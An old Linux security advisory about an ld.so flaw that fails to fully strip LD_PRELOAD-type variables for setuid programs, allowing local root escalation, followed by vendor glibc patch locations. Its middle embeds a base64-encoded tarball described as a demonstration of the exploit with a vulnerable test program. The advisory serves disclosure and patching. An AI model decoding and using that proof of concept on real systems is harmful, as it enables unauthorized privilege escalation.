COMMAND
ld.so
SYSTEMS AFFECTED
Linux
PROBLEM
Caldera Systems issued following in their advisory. A bug has
been discovered in ld.so that could allow local users to obtain
super user privilege.
The dynamic loader ld.so is responsible for making shared
libraries available within a program at run-time. Normally, a
user is allowed to load additional shared libraries when executing
a program; they can be specified with environment variables like
LD_PRELOAD.
Since this is not acceptable for applications that run setuid root
ld.so normally removes these environment variables for these.
The bug causes these environment variables to not be removed
completely under some circumstances. While setuid programs
themselves are not vulnerable, external programs they execute can
be affected by this problem.
For anyone interested, Seth D. Leonard has put together a
demonstration of this problem. The conditions which cause the
bug are probably rare to find in real-world suid programs. There
is an example vulnerable program included in the tarball. In the
short testing performed on a linux SuSE 6.2 box, Seth didn't find
common suid programs to be vulnerable (he tested only sendmail &
rcp). He didn't do any tests with perl, but suid perl could
potentially produce tasty results.
Here's the mimed versions of test:
---
Content-Type: application/octet-stream; name="rumple.tgz"
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="rumple.tgz"
Content-MD5: 8+RIAcO4QiGq8RxD+CgMmw==
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
-----
SOLUTION
Debian recommends its users to upgrade to the new packages.
* OpenLinux Desktop 2.3
- ftp://ftp.calderasystems.com/pub/updates/OpenLinux/2.3/current/RPMS/
RPMS/glibc-2.1.1-2.i386.rpm
RPMS/glibc-devel-2.1.1-2.i386.rpm
RPMS/glibc-devel-static-2.1.1-2.i386.rpm
RPMS/glibc-localedata-2.1.1-2.i386.rpm
- ftp://ftp.calderasystems.com/pub/updates/OpenLinux/2.3/current/SRPMS/
SRPMS/glibc-2.1.1-2.src.rpm
* OpenLinux eServer 2.3 and OpenLinux eBuilder for ECential 3.0
- ftp://ftp.calderasystems.com/pub/updates/eServer/2.3/current/RPMS/
RPMS/glibc-2.1.3-3S.i386.rpm
RPMS/glibc-devel-2.1.3-3S.i386.rpm
RPMS/glibc-devel-static-2.1.3-3S.i386.rpm
RPMS/glibc-localedata-2.1.3-3S.i386.rpm
- ftp://ftp.calderasystems.com/pub/updates/eServer/2.3/current/SRPMS
SRPMS/glibc-2.1.3-3S.src.rpm
* OpenLinux eDesktop 2.4
- ftp://ftp.calderasystems.com/pub/updates/eDesktop/2.4/current/RPMS/
RPMS/glibc-2.1.2-4.i386.rpm
RPMS/glibc-devel-2.1.2-4.i386.rpm
RPMS/glibc-devel-static-2.1.2-4.i386.rpm
RPMS/glibc-localedata-2.1.2-4.i386.rpm
- ftp://ftp.calderasystems.com/pub/updates/eDesktop/2.4/current/SRPMS
SRPMS/glibc-2.1.2-4.src.rpm
For Linux-Mandrake:
Linux-Mandrake 7.0: 7.0/RPMS/glibc-2.1.3-14mdk.i586.rpm
7.0/RPMS/glibc-devel-2.1.3-14mdk.i586.rpm
7.0/RPMS/glibc-profile-2.1.3-14mdk.i586.rpm
7.0/SRPMS/glibc-2.1.3-14mdk.src.rpm
Linux-Mandrake 7.1: 7.1/RPMS/glibc-2.1.3-15mdk.i586.rpm
7.1/RPMS/glibc-devel-2.1.3-15mdk.i586.rpm
7.1/RPMS/glibc-profile-2.1.3-15mdk.i586.rpm
7.1/SRPMS/glibc-2.1.3-15mdk.src.rpm
For RedHat:
ftp://updates.redhat.com/5.2/sparc/glibc-2.0.7-29.2.sparc.rpm
ftp://updates.redhat.com/5.2/sparc/glibc-debug-2.0.7-29.2.sparc.rpm
ftp://updates.redhat.com/5.2/sparc/glibc-devel-2.0.7-29.2.sparc.rpm
ftp://updates.redhat.com/5.2/sparc/glibc-profile-2.0.7-29.2.sparc.rpm
ftp://updates.redhat.com/5.2/alpha/glibc-2.0.7-29.2.alpha.rpm
ftp://updates.redhat.com/5.2/alpha/glibc-debug-2.0.7-29.2.alpha.rpm
ftp://updates.redhat.com/5.2/alpha/glibc-devel-2.0.7-29.2.alpha.rpm
ftp://updates.redhat.com/5.2/alpha/glibc-profile-2.0.7-29.2.alpha.rpm
ftp://updates.redhat.com/5.2/i386/glibc-2.0.7-29.2.i386.rpm
ftp://updates.redhat.com/5.2/i386/glibc-debug-2.0.7-29.2.i386.rpm
ftp://updates.redhat.com/5.2/i386/glibc-devel-2.0.7-29.2.i386.rpm
ftp://updates.redhat.com/5.2/i386/glibc-profile-2.0.7-29.2.i386.rpm
ftp://updates.redhat.com/6.2/sparc/glibc-2.1.3-19.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/glibc-devel-2.1.3-19.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/glibc-profile-2.1.3-19.sparc.rpm
ftp://updates.redhat.com/6.2/sparc/nscd-2.1.3-19.sparc.rpm
ftp://updates.redhat.com/6.2/i386/glibc-2.1.3-19.i386.rpm
ftp://updates.redhat.com/6.2/i386/glibc-devel-2.1.3-19.i386.rpm
ftp://updates.redhat.com/6.2/i386/glibc-profile-2.1.3-19.i386.rpm
ftp://updates.redhat.com/6.2/i386/nscd-2.1.3-19.i386.rpm
ftp://updates.redhat.com/6.2/alpha/glibc-2.1.3-19.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/glibc-devel-2.1.3-19.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/glibc-profile-2.1.3-19.alpha.rpm
ftp://updates.redhat.com/6.2/alpha/nscd-2.1.3-19.alpha.rpm
ftp://updates.redhat.com/6.2/sparcv9/glibc-2.1.3-19.sparcv9.rpm
ftp://updates.redhat.com/6.2/SRPMS/glibc-2.1.3-19.src.rpm
For Conectiva Linux:
ftp://atualizacoes.conectiva.com.br/4.0/SRPMS/glibc-2.1.2-13cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/glibc-2.1.2-13cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/glibc-devel-2.1.2-13cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/glibc-profile-2.1.2-13cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/nscd-2.1.2-13cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/SRPMS/glibc-2.1.2-13cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/glibc-2.1.2-13cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/glibc-devel-2.1.2-13cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/glibc-profile-2.1.2-13cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/nscd-2.1.2-13cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/SRPMS/glibc-2.1.2-13cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/glibc-2.1.2-13cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/glibc-devel-2.1.2-13cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/glibc-profile-2.1.2-13cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/nscd-2.1.2-13cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/SRPMS/glibc-2.1.2-13cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/glibc-2.1.2-13cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/glibc-devel-2.1.2-13cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/glibc-profile-2.1.2-13cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/nscd-2.1.2-13cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/SRPMS/glibc-2.1.3-9cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/glibc-2.1.3-9cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/glibc-devel-2.1.3-9cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/glibc-profile-2.1.3-9cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/nscd-2.1.3-9cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/SRPMS/glibc-2.1.3-9cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/glibc-2.1.3-9cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/glibc-devel-2.1.3-9cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/glibc-profile-2.1.3-9cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/nscd-2.1.3-9cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/SRPMS/glibc-2.1.3-9cl.src.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/glibc-2.1.3-9cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/glibc-devel-2.1.3-9cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/glibc-profile-2.1.3-9cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/nscd-2.1.3-9cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/SRPMS/glibc-2.1.3-9cl.src.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/glibc-2.1.3-9cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/glibc-devel-2.1.3-9cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/glibc-profile-2.1.3-9cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/nscd-2.1.3-9cl.i386.rpm